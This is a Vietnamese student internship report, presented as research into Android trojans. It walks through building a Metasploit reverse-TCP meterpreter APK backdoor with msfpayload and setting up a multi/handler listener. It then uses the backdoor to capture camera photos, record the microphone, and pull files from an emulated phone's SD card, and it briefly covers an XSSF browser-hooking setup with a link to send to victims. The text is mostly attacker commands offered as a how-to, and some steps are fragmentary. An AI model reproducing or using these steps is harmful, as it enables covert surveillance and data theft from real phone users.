Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Cách tạo mã độc trên kali linux và triển khai trên android ảo
1. BÁO CÁO THỰC TẬP
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ
liệu như danh sách contact, tin nhắn trên điện thoại sử
dụng Android và gửi ra ngoài
Sinh viên thực hiện :Nguyễn Hoàng Thạch
GVHD: Võ Đỗ Thắng
TP.HCM, ngày 13 tháng 7 năm 2014
2. Tạo mã độc trên Kali Linux để xâm nhập Android
I.Tạo lập Backdoor
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload
lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network
như sau:
Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware
Bấm vào Network Adapter và chọn NAT:Used to share the host’s IP address
3. Bấm vào Edit -> Virtual Network Editor...
Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật
4. Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android
Đầu tiên mở terminal và gõ dòng lệnh
msfpayload android/meterpreter/reverse_tcp lhost=192.168.220.128 lport=8080 R >
/root/Desktop/app.apk
5. 192.168.220.128 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng
Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor.
6. Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set lport 8080 – nhập port giống với port khi tạo payload ở trên.
Exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
7. Thử với một máy Sony Xperia Z giả lập, tải về app.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào
nút reverse_tcp:
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:
8. Để xem thông tin về máy, nhập lệnh SysInfo
Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
9. Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở
phần trước. Ví dụ như sau:
File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy
10. Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
11. Ví dụ ở đây, ta tải file app.apk trong thư mục download của sdcard
13. Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh
Download App.apk
Và file này sẽ được tải về thư mục root của máy Kali
II.XSSF
Để cài đặt XSSF cho kali sử sụng 3 câu lệnh:
msfupdate
15. Tiếp tục là lệnh
XSSF LOG PAGE : http://192.168.220.128:80/xssf/gui.html?guipage=main
16. Địa chỉ gửi cho nạn nhân là: http://192.168.220.128:80/xssf/test.html
Kết quả trên terminal:
17. Lệnh xssf_victim dùng để hiện thong tin nạn nhân
Lệnh xssf_information dùng để hiện thông tin nạn nhân chi tiết hơn
Tiếp tục lệnh search auxiliary/xssf